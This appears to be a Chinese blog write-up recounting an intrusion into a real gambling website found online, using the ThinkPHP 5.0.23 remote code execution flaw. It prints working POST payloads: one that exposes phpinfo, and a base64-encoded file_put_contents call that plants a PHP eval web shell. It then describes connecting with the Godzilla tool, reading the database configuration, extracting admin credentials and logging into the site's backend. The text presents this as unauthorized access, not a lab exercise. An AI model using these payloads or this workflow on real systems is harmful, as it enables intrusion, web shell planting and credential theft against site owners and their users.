01 前提
在早些时候看到先知上有一篇关于thinkphp rce的菠菜文章
于是顺着师傅的思路也来试试
从网上顺利找到的某一个相似的站点,然后就按照师傅的思路来了
02 geshell之路
通过报错的方式发现了当前的版本为
ThinkPHPV5.0.23
通过师傅的思路,先去找phpinfo界面
http://127.0.0.1/index.php?s=captcha
POST数据:
_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=phpinfo()
成功拿到phpinfo
界面
查看下这里禁用了贼多的命令
那尝试写一下一句话木马吧,按照师傅写的参考里面使用了很多次都没有效果,此时一度陷入僵局。
后来经过不断的fuzz发现,这里获取phpinfo界面的方式还有post的,后端可以同时接收get
和post
的数据。
知道这个之后,按照师傅文章的提示进行如下的数据构造:
_method=__construct&filter[]=assert&method=post&server[REQUEST_METHOD]=file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))
将一句话木马进行加密
命令执行成功,get到shell
03 进后台
在路径:
/www/wwwroot/xxxxx/application/
发现数据库配置文件
蚁剑连接数据库失败:
使用哥斯拉连接数据库成功
查询到后台的账号和密码,在后台中翻到了后台地址(啊,这还不如直接猜。。。。)
登陆后台成功
04 总结
这次主要是踩在师傅宽大的肩膀上成功getshell的,但是还没能进行提权,命令直接被禁用,等下次有时间的时候再搞吧,溜了溜了